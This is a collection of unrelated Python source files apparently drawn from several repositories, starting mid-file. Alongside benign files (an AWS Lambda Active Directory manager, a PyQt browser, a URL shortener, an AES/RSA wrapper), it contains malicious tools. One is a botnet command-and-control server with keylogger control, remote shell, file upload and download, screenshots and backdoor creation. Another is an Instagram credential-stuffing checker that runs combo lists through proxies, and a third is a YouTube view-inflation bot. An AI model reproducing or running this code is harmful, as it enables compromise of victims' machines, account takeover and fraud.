html443 = f.read(25000)
s = difflib.SequenceMatcher(lambda x: x == " ", html443, html80)
if round(s.ratio(), 3) > 0.75:
return True
return False
except:
return False
```
#### File: RPTR/core/rifle.py
```python
import os
import subprocess
from dbmanager import *
import time
class Rifle:
'shoots bullets'
def __init__(self, id_test, command):
#create new dbmanager
self.dbmanager = Dbmanager()
#fire bullet
self.fire_bullet(id_test, command)
def fire_bullet(self, id_test, command):
os.chdir(os.path.dirname(os.path.abspath(__file__)))
#get current time
start = time.time()
#start tool execution in new proces
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
#get output form process
out, err = p.communicate()
#calculate how much time the tool used
exec_time = time.strftime("%H:%M:%S", time.gmtime(time.time() - start))
#write tool output to database
self.dbmanager.tool_log_create(id_test, command, exec_time, out)
``` |
{
"source": "john-delivuk/lambda-ad-manager",
"score": 2
} |
#### File: john-delivuk/lambda-ad-manager/ad-manager.py
```python
import json
import boto3
import ldap3
import sys
import json
import socket
def add(instance):
#print(instance)
tags = lookup_aws_tags(instance)
    instance_ou = config['BaseDN']
if lookup_tag_value(tags,'Application'):
application = lookup_tag_value(tags,'Application')
instance_ou = 'OU={0},{1}'.format(application,config['BaseDN'])
        # ou_exists/create_ou build the DN themselves, so pass the bare OU name
        if not ou_exists(application, config['BaseDN']):
            create_ou(application, config['BaseDN'])
ssm_client = boto3.client('ssm')
ssm_client.create_association(
Name=config['SSMDocumentName'],
InstanceId=instance,
Parameters={
'directoryId' : [config['DirectoryId']],
'directoryName' : [config['DomainName']],
'directoryOU' : [instance_ou],
'dnsIpAddresses' : config['DnsServers']
}
)
return True
def ou_exists(ou_name, base_dn):
conn = connect()
obj_filter = '(&(Name={0})(objectCategory=organizationalUnit))'.format(ou_name)
if conn.search(base_dn, obj_filter):
conn.unbind()
return True
else:
conn.unbind()
return False
def create_ou(ou_name, base_dn):
conn = connect()
conn.add('OU={0},{1}'.format(ou_name, base_dn), 'organizationalUnit')
conn.unbind()
return True
def connect():
auth_user_dn = config['UserName']
auth_user_pw = config['Password']
server = ldap3.Server(config['DomainName'], get_info='ALL')
return ldap3.Connection(server, auth_user_dn, auth_user_pw, auto_bind=True)
def get_account_id(context):
return context.invoked_function_arn.split(':')[4]
def get_config(file, env):
try:
target_config_set = json.load(open(file))[env]
except ValueError:
        print('Unable to retrieve the configuration set {0} from file {1}. Please verify the configuration set exists and the file is readable'.format(env, file))
return target_config_set
def delete(instance):
conn = connect()
base_dn = config['BaseDN']
obj_filter = '(&(Name={0})(objectCategory=computer))'.format(instance)
conn.search(base_dn, obj_filter)
if len(conn.entries) == 1:
target = conn.entries[0].entry_get_dn()
conn.delete(target)
elif len(conn.entries) < 1:
        print('No objects were found that match the terminated instance, {0}.'.format(instance))
else:
print('More then one object was returned for your search, as a precaution this program will skip this instance, {0}.'.format(instance))
conn.unbind()
return True
def lookup_aws_tags (instanceid):
ec2_resource = boto3.resource('ec2')
return ec2_resource.Instance(instanceid).tags
def lookup_tag_value(tags, tagName):
try:
value_index = next(index for (index, d) in enumerate(tags) if d["Key"] == tagName)
except StopIteration as err:
return None
else:
return tags[value_index]['Value']
def lambda_handler(event, context):
aws_account_id = get_account_id(context)
global config
config = get_config('./config.json', aws_account_id)
#print(socket.gethostbyname(config['DomainName']))
for record in event['Records']:
message_details = json.loads(record['Sns']['Message'])
if message_details['Event'] == 'autoscaling:EC2_INSTANCE_LAUNCH':
add(message_details['EC2InstanceId'])
elif message_details['Event'] == 'autoscaling:EC2_INSTANCE_TERMINATE':
delete(message_details['EC2InstanceId'])
else:
print('Unable to read event')
print(str(record))
return True
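# A sketch of the SNS event this handler expects (field names taken from the code
# above; the instance id and values shown here are hypothetical):
#
#   {
#     "Records": [{
#       "Sns": {
#         "Message": "{\"Event\": \"autoscaling:EC2_INSTANCE_LAUNCH\", \"EC2InstanceId\": \"i-0123456789abcdef0\"}"
#       }
#     }]
#   }
#
# lambda_handler() json-loads each Message and dispatches to add() or delete().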
``` |
{
"source": "johndemlon/c-and-c-server",
"score": 3
} |
#### File: c-and-c-server/core/communicate.py
```python
import time
import json
import base64
import threading
from file import File
from ping import Ping
from shell import Shell
from valid import Valid
class Bot(object):
''' Holds bot information '''
def __init__(self, session):
self.system = None
self.location = None
self.keylogging = False
self.session = session
class Communicate(Ping, Valid, File):
'''
[Server]
/ \
/ \
[Master] [Bot]
'''
def __init__(self):
File.__init__(self)
Ping.__init__(self)
Valid.__init__(self)
def struct(self, num, args=''):
# formats the data that is being sent
return json.dumps({'id': num, 'args': args.split() if not args else args})
def geo(self, session):
try:
if self.wait:return
session.settimeout(15)
self.sendData(session, self.struct(102))
return json.loads(session.recv(1024))
except:pass
def sys(self, session):
try:
if self.wait:return
session.settimeout(15)
self.sendData(session, self.struct(103))
return json.loads(session.recv(1024))
except:pass
def sendData(self, session, data):
try:session.sendall(data)
except:pass
def addBot(self, session):
if not self.server_status:return
bot = Bot(session)
time.sleep(1.5)
bot.system = self.sys(session)
time.sleep(1.5)
bot.location = self.geo(session)
self.botnet.append(bot)
if not self.ping:
self.ping = True
threading.Thread(target=self.startPing).start()
def system(self, num):
try:
bot = self.botnet[eval(num)-1]
if not bot.system:return
system = bot.system
if len(system):print
print '[System Info]'
for n in sorted(system, key=len):
print '[-] {}: {}'.format(n, system[n])
print '[+] Keylogging:',bot.keylogging
except:pass
def location(self, num):
try:
bot = self.botnet[eval(num)-1]
if not bot.location:return
location = bot.location
if len(location):print
print '[Geolocation]'
for n in sorted(location, key=len):
print '[-] {}: {}'.format(n, location[n])
if len(location):print
except:pass
def keylogger(self, num, state):
try:
bot = self.botnet[eval(num)-1]
state = 5 if state.upper() == 'START' else 6 if state.upper() == 'STOP' else 7 if state.upper() == \
'REMOVE' else 8 if state.upper() == 'DUMP' else None
if not state:return
if state == 5:
bot.keylogging = True
self.sendData(bot.session, self.struct(5))
if state == 6:
bot.keylogging = False
self.sendData(bot.session, self.struct(6))
if state == 7:
bot.keylogging = False
self.sendData(bot.session, self.struct(7))
if state == 8:self.showkeys(bot.session)
except:pass
def showkeys(self, session):
self.wait = True
try:
session.settimeout(10)
self.sendData(session, self.struct(8))
size = int(session.recv(1024))
time.sleep(1.5)
session.sendall('200')
session.settimeout(3)
keys = ''
while self.alive:
try:keys+=session.recv(size)
except:break
print base64.b64decode(keys)
except:self.wait = False
def display(self):
if not self.server_status:
print 'Error: Please start the C&C server & try again'
return
# zero bots
if not self.botnet:
print 'Botnet Size: 0'
# display the botnet
for num, bot in enumerate(self.botnet):
try:
ip = bot.location['Ip'] if bot.location else 'UNKNOWN'
ip = ip if ip else 'UNKNOWN'
if not num:
print '\nIP {}\tID'.format(''.ljust(15))
print '.. {}\t..\n'.format(''.ljust(15))
# display information
print '{}\t\t{:02}'.format(ip.ljust(15-len(ip)%15), num+1)
except:pass
if len(self.botnet):print
def killBot(self, bot):
try:
self.kill(bot.session)
del self.botnet[self.botnet.index(bot)]
except:pass
def shell(self, bot, prompt):
self.wait = True
Shell(bot).run(prompt)
self.wait = False
```
#### File: c-and-c-server/core/console.py
```python
import os
import time
import json
from cmd2 import Cmd
from subprocess import Popen
class MainController(Cmd):
''' Control the main program '''
def __init__(self):
Cmd.__init__(self)
self.colors = {
'red': '\033[31m',
'blue': '\033[34m',
'white': '\033[0m',
'green': '\033[32m',
'yellow': '\033[33m'
}
self.debug = True
self.ruler = '-'
self.default_to_shell = True
self.doc_header = '\n{0}Possible Commands {2}({2}type {1}help <{2}command{1}>{2})'.\
format(self.colors['blue'], self.colors['yellow'], self.colors['white'])
self.intro = '\n\ttype {}help{} for help\n'.\
format(self.colors['yellow'], self.colors['white'])
Popen('clear'.split()).wait()
if not os.path.exists('/tmp/msg'):
with open('/tmp/msg','w') as f:pass
print '\n[-] Enter help for help\n[-] Enter help [CMD_NAME] for more detail'''
def _help_menu(self):
""""Show a list of commands which help can be displayed for.
"""
ignore = ['shell', '_relative_load', 'cmdenvironment', 'help', 'history', 'load',
'edit', 'py', 'pyscript', 'set', 'show', 'save', 'shortcuts', 'run']
# get a list of all method names
names = self.get_names()
# remove any command names which are explicitly excluded from the help menu
for name in self.exclude_from_help:
names.remove(name)
cmds_doc = []
help_dict = {}
for name in names:
if name[:5] == 'help_':
help_dict[name[5:]] = 1
names.sort()
prevname = ''
for name in names:
if name[:3] == 'do_':
if name == prevname:
continue
prevname = name
command = name[3:]
if command in ignore:
continue
if command in help_dict:
cmds_doc.append(command)
del help_dict[command]
elif getattr(self, name).__doc__:
cmds_doc.append(command)
else:pass
self.print_topics(self.doc_header, cmds_doc, 15, 80)
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
self.stdout.write("%s\n"%str(header))
if self.ruler:
self.stdout.write("+%s+\n"%str(self.ruler * (len(header))))
self.columnize(cmds, maxcol-1)
self.stdout.write("\n")
# Basic commands
def do_setip(self, arg=None):
''' \n\tDescription: Assign the IP to host the server\n\tUsage: setip [IP]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkIP(arg[0]):return
self.ip = arg[0]
def do_setport(self, arg=None):
''' \n\tDescription: Assign the port to host the server\n\tUsage: setport [PORT]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkPORT(arg[0]):return
self.port = eval(arg[0])
def do_create(self, arg=None):
''' \n\tDescription: Create a backdoor\n\tUsage: create [IP] [PORT] [NAME]\n '''
arg = arg.split()
if not self.checkArg(arg, 3):return
if not self.checkIP(arg[0]):return
if not self.checkPORT(arg[1]):return
if not self.checkName(arg[2]):return
self.createBot(arg[0], arg[1], os.path.splitext(arg[2])[0])
Popen('clear'.split()).wait()
print '[{}+{}] Backdoor Created Successfully'.format(self.colors['green'], self.colors['white']) if \
os.path.exists(os.path.splitext(arg[2])[0]+'.exe') else '[-] Error: Backdoor Creation Failed'
def do_remove(self, arg=None):
''' \n\tDescription: Remove a bot from botnet (Permanently)\n\tUsage: remove [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
bot = self.botnet[eval(arg[0])-1]
self.sendData(bot.session, self.struct(1))
self.killBot(bot)
def do_chrome(self, arg=None):
''' \n\tDescription: Launch chrome & open unlimited amount of tabs\n\tUsage: chrome [ID] [URL1] [URL2] [URLn]\n '''
arg = arg.split()
if not self.checkID(arg[0]):return
if not self.checkArg(arg, min=2):return
self.sendData(self.botnet[eval(arg[0])-1].session, self.struct(97, arg[1:]))
def do_shutdown(self, arg=None):
''' \n\tDescription: Shutdown a bot\n\tUsage: shutdown [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
bot = self.botnet[eval(arg[0])-1]
self.sendData(bot.session, self.struct(96))
self.killBot(bot)
# Botnet commands
def do_botnet(self, arg=None):
''' \n\tDescription: Display a list of connected bots\n\tUsage: botnet\n '''
self.display()
# Bot commands
def do_kill(self, arg=None):
''' \n\tDescription: Kill the connection to a bot (Connects back a later time)\n\tUsage: kill [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
bot = self.botnet[eval(arg[0])-1]
self.sendData(bot.session, self.struct(0))
self.killBot(bot)
def do_reset(self, arg=None):
''' \n\tDescription: Reset the connection to a bot\n\tUsage: reset [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
self.killBot(self.botnet[eval(arg[0])-1])
def do_keylogger(self, arg=None):
''' \n\tDescription: Keylogger\n\tUsage: keylogger [ID] [START|STOP|DUMP|REMOVE]\n '''
arg = arg.split()
if not self.checkArg(arg, 2):return
if not self.checkID(arg[0]):return
self.keylogger(arg[0], arg[1])
def do_getinfo(self, arg=None):
''' \n\tDescription: Display the personal information of a bot\n\tUsage: getinfo [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
self.system(arg[0]) # sys
self.location(arg[0]) # geo
def do_upload(self, arg=None):
''' \n\tDescription: Upload a file to a bot (Uploaded to C:\System)\n\tUsage: upload [ID] [PATH]\n '''
arg = arg.split()
if not self.checkArg(arg, min=2):return
if not self.checkID(arg[0]):return
self.upload(self.botnet[eval(arg[0])-1], ' '.join(arg[1:]))
def do_download(self, arg=None):
''' \n\tDescription: Download a file from a bot\n\tUsage: download [ID] [PATH]\n '''
arg = arg.split()
if not self.checkArg(arg, min=2):return
if not self.checkID(arg[0]):return
self.download(self.botnet[eval(arg[0])-1], ' '.join(arg[1:]))
def do_screenshot(self, arg=None):
''' \n\tDescription: Screenshot of a bot\n\tUsage: screenshot [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
self.download(self.botnet[eval(arg[0])-1], num=100)
def do_shell(self, arg=None):
''' \n\tDescription: Open an interactive shell\n\tUsage: shell [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
bot = self.botnet[eval(arg[0])-1]
try:
self.sendData(bot.session, self.struct(101))
host = bot.system['Username'] if bot.system else 'UNKNOWN'
ip = bot.location['Ip'] if bot.location else 'UNKNOWN'
host = host if host else 'UNKNOWN'
ip = ip if ip else 'UNKNOWN'
self.shell(bot, self.getprompt(ip, host, True))
except:pass
# Server commands
def do_server_start(self, arg=None):
''' \n\tDescription: Start the server\n\tUsage: server_start\n '''
self.startServer()
def do_server_stop(self, arg=None):
''' \n\tDescription: Stop the server\n\tUsage: server_stop\n '''
self.stopServer()
def do_server_restart(self, arg=None):
''' \n\tDescription: Restart the server\n\tUsage: server_restart\n '''
self.restartServer()
def do_server_info(self, arg=None):
''' \n\tDescription: Display information about the server\n\tUsage: server_status\n '''
running = '\n[-] Last Active On: {}:{}'.format(self.activeIP, self.activePort)
connections = '\n[-] Connections: {}'.format(len(self.botnet))
print '\n[-] Port: {}\n[-] IP: {}\n[-] Active: {}{}{}\n\
'.format(self.port,
self.ip,
self.server_status,
connections if self.server_status else '',
running if self.server_status else '')
```
#### File: c-and-c-server/core/prompt.py
```python
import os
from platform import node
class Prompt(object):
''' A nice looking prompt '''
def __init__(self):
# colors
self.n = '\033[0m'
self.b = '\033[94m'
self.r = '\033[91m'
def getprompt(self, name=node(), host=os.getlogin(), shell=False):
dirs = os.getcwd().replace(os.path.expanduser('~'), '')
return '{}{}@{}{}::{}~{}{}# '.format(self.r, host,
name, self.n,
self.b, dirs,
self.n) if not shell else '{}{}@{}{}::# '.format(self.r, name, host, self.n)
``` |
{
"source": "johndemlon/console",
"score": 2
} |
#### File: johndemlon/console/console.py
```python
from sys import version
from platform import system
from os import chdir, getcwd, system as sys_shell
try:
from subprocess import getoutput as shell
except ImportError:
from subprocess import check_output as shell
class Console(object):
__version__ = 0.1
__date__ = '05/31/2018'
__author__ = '<NAME>'
__description__ = 'Console Application'
def __init__(self):
self.LINE = '-'
self.EDGES = '+'
self.DEBUG = False
self.MAX_SIZE = 50
self.prompt = '$> '
self.is_alive = True
self.TABS_AMOUNT = 5
self.home = getcwd()
self.default_to_shell = True
self.cmds = { 'help': self._help }
self.BANNER = 'Possible Commands (type help <command>)'
self.input = raw_input if self.version == 2 else input
self.INTRO = '{0}type help for help{0}'.format('\n\n\t')
self.cls_cmd = 'cls' if system() == 'Windows' else 'clear'
@property
def version(self):
return int(version.split()[0].split('.')[0])
def shell(self, cmds):
if cmds.split()[0].lower() == 'cd':
path = cmds.split()[1] if len(cmds.split()) > 1 else self.home
try:chdir(path)
except FileNotFoundError:pass
else:
print('{0}{1}{0}'.format('\n', shell([cmds]) if self.version == 2 else shell(cmds)))
def set_cmds(self):
# find all function which begin with cmd_
cmd_funcs = [item for item in dir(self) if callable(getattr(self, item))
if not all([item.startswith('__'), item.endswith('__')])
if item.startswith('cmd_')]
# reassign names
for func in cmd_funcs:
name = func.split('cmd_')[1].lower()
self.cmds[name] = getattr(self, func)
def cmd_cls(self, *args):
'''Description: clear the screen\nUsage: cls'''
sys_shell(self.cls_cmd)
def cmd_exit(self, *args):
'''Description: to quit the console\nUsage: quit\nUsage: exit'''
self.stop_loop()
def cmd_quit(self, *args):
'''Description: to quit the console\nUsage: quit\nUsage: exit'''
self.stop_loop()
def _help(self, *args):
'''Description: to display help\nUsage: help <command>\nUsage: help'''
if not len(args):
self.help_menu()
else:
func_name = args[0][0]
if func_name in self.cmds:
doc = self.cmds[func_name].__doc__
if not doc:
print('{0}{1} is not documented{0}'.format('\n\n', func_name))
else:
print('{0}{1}{0}'.format('\n\n', doc))
def help_menu(self):
size = 0
print('\n' + self.BANNER)
all_cmds = sorted(self.cmds, key=len)
cmds = '\n{}'.format(' '* int(self.TABS_AMOUNT - (self.TABS_AMOUNT * 0.5) ))
print('{0}{1}{0}'.format(self.EDGES, self.LINE * self.MAX_SIZE))
for _, cmd in enumerate(all_cmds):
name = cmd + (' ' * self.TABS_AMOUNT)
cmds += name
size += len(name)
next_value_size = 0 if _ > len(all_cmds) else len(all_cmds[_] + (' ' * self.TABS_AMOUNT))
if (size + next_value_size) >= self.MAX_SIZE + (self.TABS_AMOUNT * 0.8):
size = 0
cmds += '\n\n{}'.format(' ' * self.TABS_AMOUNT)
print(cmds + '\n')
def stop_loop(self):
self.is_alive = False
def user_input(self):
user_input = self.input(self.prompt)
if not len(user_input):
return
if user_input.split()[0].lower() in self.cmds:
if len(user_input.split()) > 1:
func = self.cmds[user_input.split()[0].lower()]
args = ' '.join(user_input.split()[1:])
func(args.split())
else:
func = self.cmds[user_input.split()[0].lower()]
func()
else:
if self.default_to_shell:
self.shell(user_input)
def debug_mode(self):
while self.is_alive:
self.user_input()
def user_mode(self):
while self.is_alive:
try:self.user_input()
except:pass
def start_loop(self):
self.set_cmds()
print(self.INTRO)
self.debug_mode() if self.DEBUG else self.user_mode()
``` |
{
"source": "johndemlon/demlon-browser",
"score": 2
} |
#### File: johndemlon/demlon-browser/mainwindow.py
```python
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import sip
from ui_mainwindow import Ui_MainWindow
from intab import *
class MainWindow(QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.tabWidget.tabBar().setDrawBase(False)
self.addNewTabButton()
self.connectActions()
self.closeTab(0)
self.newTab()
# ui.menuBar.hide();
def addNewTabButton(self):
tb = QPushButton()
tb.setObjectName('addTabBtn')
tb.setIcon(QIcon(':/icons/assets/images/dark/appbar.add.png'))
self.ui.tabWidget.setCornerWidget(tb)
def connectActions(self):
# QShortcut *sh = new QShortcut(QKeySequence(tr("Ctrl+N", "File|Open")), this);
# QObject::connect(sh, SIGNAL(activated()), this, SLOT(newTab()));
# Base UI
self.ui.tabWidget.tabCloseRequested.connect(self.closeTab)
self.ui.tabWidget.cornerWidget().pressed.connect(self.newTab)
# Actions
self.ui.actionExit.triggered.connect(self.close)
self.ui.actionNew_Tab.triggered.connect(self.newTab)
def newTab(self):
index = self.ui.tabWidget.addTab(InTab(self.ui.tabWidget), "New Tab")
self.ui.tabWidget.setCurrentIndex(index)
def closeTab(self, index):
child = self.ui.tabWidget.widget(index)
self.ui.tabWidget.removeTab(index)
sip.delete(child)
child = None
``` |
{
"source": "johndemlon/inflate-youtube-views",
"score": 3
} |
#### File: inflate-youtube-views/lib/browser.py
```python
from random import choice
from lib.queue import Queue
from os import remove, path
from threading import Thread
from time import sleep, time
from selenium import webdriver
from lib.const import DEBUG_LOG
from lib.const import USER_AGENTS
from lib.const import DRIVER_PATH
from lib.proxyScraper import Scrape
from lib.const import MIN_WATCH_TIME
from lib.const import MAX_WATCH_TIME
class Viewer(object):
def __init__(self, url, views, visits=0):
self.recentProxies = Queue()
self.proxies = Queue()
self.renewDriver = True
self.isActive = True
self.isAlive = True
self.views = views
self.visits = visits
self.url = url
self.scraper = Scrape(maxSize=30,
protocol='SSL',
cleanProxies=True)
def proxiesManager(self):
while self.isAlive:
while all([self.isAlive, self.proxies.qsize]):
[sleep(1) for _ in range(10) if self.isAlive if self.proxies.qsize]
self.collect()
if self.isAlive:
Thread(target=self.scraper.scrape).start()
while all([self.isAlive, self.scraper.proxies.qsize < 3]):pass
self.collect()
self.scraper.isAlive = False
def collect(self):
while all([self.isAlive, self.scraper.proxies.qsize]):
proxy = self.scraper.proxies.get()
if not self.recentProxies.inQueue(proxy):
self.recentProxies.put(proxy)
self.proxies.put(proxy)
def kill(self):
self.isAlive = False
def watch(self, proxy, driver):
print '\n[!] Proxy-IP: {}\n[-] Country: {}\n[+] Views: {}\n'.format(proxy['ip'], proxy['country'], self.visits+1)
if not self.isAlive:return
try:driver.get(self.url + '&t=5')
except:
self.renewDriver = True
driver.quit()
try:
html = driver.page_source.encode('utf-8')
if any(['ERR_PROXY_CONNECTION_FAILED' in html, 'ERR_TUNNEL_CONNECTION_FAILED' in html, 'ERR_EMPTY_RESPONSE' in html]):
self.renewDriver = True
driver.quit()
except:
self.renewDriver = True
driver.quit()
sleep(3)
self.isActive = False
if self.renewDriver:driver.quit()
else:self.visits += 1
def driver(self, proxy):
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--mute-audio')
chrome_options.add_argument('--log-level=3')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('user-agent={}'.format(choice(USER_AGENTS)))
chrome_options.add_argument('--proxy-server=http://{}:{}'.format(proxy['ip'], proxy['port']))
return webdriver.Chrome(executable_path=DRIVER_PATH, chrome_options=chrome_options)
def start(self):
proxy = None
driver = None
driverUsage = 0
renewDriver = True
Thread(target=self.proxiesManager).start()
while all([self.visits < self.views, self.isAlive]):
try:
if driverUsage == 10:
self.renewDriver = True
if any([not self.isAlive, self.renewDriver]):
proxy = None
if driver:driver.quit()
if self.proxies.qsize:
driverUsage = 0
self.renewDriver = False
proxy = self.proxies.get()
driver = self.driver(proxy)
if all([self.proxies.qsize, proxy]):
self.isActive = True
if not proxy:
proxy = self.proxies.get()
Thread(target=self.watch, args=[proxy, driver]).start()
# wait
while self.isActive:
try:
sleep(0.5)
self.removeDebug()
except KeyboardInterrupt:
self.isAlive = False
driverUsage += 1
if any([not self.isAlive, self.renewDriver]):
proxy = None
if driver:driver.quit()
if self.proxies.qsize:
driverUsage = 0
self.renewDriver = False
proxy = self.proxies.get()
driver = self.driver(proxy)
except KeyboardInterrupt:
self.isAlive = False
if driver:driver.quit()
self.isAlive = False
self.removeDebug()
if self.visits == self.views:
self.visits = 0
def removeDebug(self):
if path.exists(DEBUG_LOG):
remove(DEBUG_LOG)
``` |
{
"source": "johndemlon/instagram-checker",
"score": 3
} |
#### File: johndemlon/instagram-checker/main.py
```python
import requests
import random
import json
import threading
class Instagram_Checker:
APP_VERSION = "1.0.0"
INSTAGRAM_INDEX = "https://instagram.com"
INSTAGRAM_LOGIN_ENDPOINT = "https://www.instagram.com/accounts/login/ajax/"
def __init__(self):
self.proxies = []
self.combo = []
self.threads = []
print('Instagram-Checker by @br0keh - v%s' % self.APP_VERSION)
self.load_lists()
maxt = input('[?] Max threads: ')
self.max_threads = 30 if not maxt.isdigit() else int(maxt)
self.start_all_workers()
def load_lists(self):
print('Loading combo from "combo.list"...')
try:
self.combo = open('combo.list', 'r').readlines()
except:
print('[x] Unable to read combo.list')
if input('[?] Use proxies? (Y/N):') == 'Y':
print('Loading combo from "proxies.list"...')
try:
self.proxies = open('proxies.list', 'r').readlines()
except:
print('[x] Unable to read proxies.list')
def start_all_workers(self):
print('[!] Starting %i threads...' % (self.max_threads))
while len(self.threads) < self.max_threads:
t = threading.Thread(target=self.worker)
t.start()
self.threads.append(t)
def worker(self):
while len(self.combo) > 0:
last = self.combo.pop()
user = last.split(':')[0]
pasw = last.split(':')[1]
self.login(user, pasw)
def message(self, username, password, message):
print("%s : %s / %s" % (username, password, message))
def login(self, username, password):
password = <PASSWORD>', <PASSWORD>', '')
session = requests.Session()
if len(self.proxies) > 0:
session.proxies.update({
'http': 'http://' + random.choice(self.proxies),
'https': 'https://' + random.choice(self.proxies)
})
session.headers.update({
'ig_vw': '1920',
'ig_pr': '1'
})
session.headers.update({
'UserAgent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'x-instagram-ajax': '1',
'X-Requested-With': 'XMLHttpRequest',
'origin': 'https://www.instagram.com',
'ContentType': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive',
'Accept': '*/*',
'Referer': 'https://www.instagram.com',
'authority': 'www.instagram.com',
'Host': 'www.instagram.com',
'Accept-Language': 'en-US;q=0.6,en;q=0.4',
'Accept-Encoding': 'gzip, deflate'
})
try:
request = session.get(self.INSTAGRAM_INDEX)
csrf_token = request.cookies.get_dict()['csrftoken']
session.headers.update({
'X-CSRFToken': csrf_token
})
request = session.post(self.INSTAGRAM_LOGIN_ENDPOINT,
data={
'username': username,
'password': password
})
csrf_token = request.cookies.get_dict()['csrftoken']
session.headers.update({
'X-CSRFToken': csrf_token
})
response = json.loads(request.text)
except:
self.combo.append('%s:%s' % (username, password))
return self.message(username, password, 'REQUEST ERROR. ADDED TO QUEUE AGAIN...')
if response['authenticated'] == True:
return self.message(username, password, 'SUCCESS : [ %s ]' % str(session))
elif response['status'] == 'fail':
return self.message(username, password, '%s' % str(response['message']))
elif response['status'] == 'ok':
return self.message(username, password, 'WRONG CREDENTIALS')
else:
return self.message(username, password, 'UNKNOWN ERROR')
if __name__ == "__main__":
insta_checker = Instagram_Checker()
``` |
{
"source": "johndemlon/url-shorter",
"score": 3
} |
#### File: johndemlon/url-shorter/micro.py
```python
from os import urandom
import requests as urlrequest
from urllib.parse import urlparse
from lib.database import Database
from flask import Flask, render_template, request, jsonify, redirect, abort
class Webserver:
def __init__(self):
self.database = Database()
self.app = Flask(__name__)
self.app.secret_key = urandom(0x200)
@property
def server_url(self):
parse = urlparse(request.url)
return '{}://{}/'.format(parse.scheme, parse.netloc)
def add_paths(self):
self.app.add_url_rule('/', 'index', self.index, defaults={'link_id': ''})
self.app.add_url_rule('/<path:link_id>', 'index', self.index)
self.app.add_url_rule('/create', 'create', self.create, methods=['POST'])
def index(self, link_id):
if link_id:
if self.database.link_id_exists(link_id):
url = self.database.get_link_url(link_id)
return redirect(url)
return abort(404)
return render_template('index.html')
def parser_url(self, url):
parse = urlparse(url)
link1 = '{}://{}{}{}{}{}'.format(
'https' if not parse.scheme else parse.scheme,
parse.netloc.lower(), parse.path, parse.params, '?' + parse.query if parse.query else '', parse.fragment
)
        # only swap the scheme prefix, not every 'https' substring in the URL
        link2 = link1.replace('https://', 'http://', 1)
try:
urlrequest.get(link1)
link = link1
except:
link = link2
return link if ((parse.netloc or parse.path) and urlparse(request.url).netloc != parse.netloc) else ''
def get_link_id(self, link_url):
url = urlparse(request.url).netloc
link_id = self.database.generate_link_id(url)
self.database.add_link(link_url, link_id)
return link_id
def create(self):
if not 'link' in request.form:
return jsonify({ 'resp': '' })
link_url = request.form['link']
link_url = self.parser_url(link_url)
if not link_url:
return jsonify({ 'resp': '' })
if self.database.link_url_exists(link_url):
return jsonify({ 'resp': self.server_url + self.database.get_link_id(link_url) })
link_id = self.get_link_id(link_url)
return jsonify({ 'resp': self.server_url + link_id})
def start(self):
self.add_paths()
self.database.start()
self.app.run(debug=False)
if __name__ == '__main__':
webserver = Webserver()
webserver.start()
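# A client-side sketch (assumes the Flask dev server defaults, i.e. localhost:5000):
#   import requests
#   resp = requests.post('http://localhost:5000/create', data={'link': 'https://example.com'})
#   print(resp.json()['resp'])   # short URL such as http://localhost:5000/<link_id>
# Visiting the returned URL goes through index(), which redirects to the original link.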
``` |
{
"source": "johndemlon/wrap-pycrpto",
"score": 3
} |
#### File: johndemlon/wrap-pycrpto/crypto.py
```python
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
from Crypto.Signature import pkcs1_15
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Random import get_random_bytes
class CryptoRSA:
@staticmethod
def gen_key():
key = RSA.generate(2048)
private_key = key.export_key()
public_key = key.publickey().export_key()
return public_key, private_key
@staticmethod
def encrypt(data, rec_publ_key):
recipient_key = RSA.import_key(rec_publ_key)
cipher_rsa = PKCS1_OAEP.new(recipient_key)
return cipher_rsa.encrypt(data)
@staticmethod
def decrypt(data, priv_key):
key = RSA.import_key(priv_key)
cipher_rsa = PKCS1_OAEP.new(key)
return cipher_rsa.decrypt(data)
@staticmethod
def sign(data, priv_key):
key = RSA.import_key(priv_key)
_hash = SHA256.new(data)
return pkcs1_15.new(key).sign(_hash)
@staticmethod
def verify(data, signature, publ_key):
key = RSA.import_key(publ_key)
_hash = SHA256.new(data)
try:
pkcs1_15.new(key).verify(_hash, signature)
return True
except ValueError:
return False
@staticmethod
def save(publ, priv):
for fname, key in zip(['public.pem', 'private.key'], [publ, priv]):
with open(fname, 'wb') as f:
f.write(key)
@staticmethod
def read(publ_file, priv_file):
publ = b''
priv = b''
with open('public.pem', 'rb') as f:
for n in f:
publ += n
with open('private.key', 'rb') as f:
for n in f:
priv += n
return publ, priv
class CryptoAES:
nonce_size = 12
@staticmethod
def generate_key():
return get_random_bytes(AES.block_size)
@staticmethod
def encrypt(data, key):
key = SHA256.new(key).digest()
nonce = get_random_bytes(CryptoAES.nonce_size)
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
ciphertext = cipher.encrypt(data)
return nonce + ciphertext
@staticmethod
def decrypt(ciphertext, key):
cipher_nonce = ciphertext
key = SHA256.new(key).digest()
nonce = cipher_nonce[:CryptoAES.nonce_size]
ciphertext = cipher_nonce[CryptoAES.nonce_size:]
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
plaintext = cipher.decrypt(ciphertext)
return plaintext
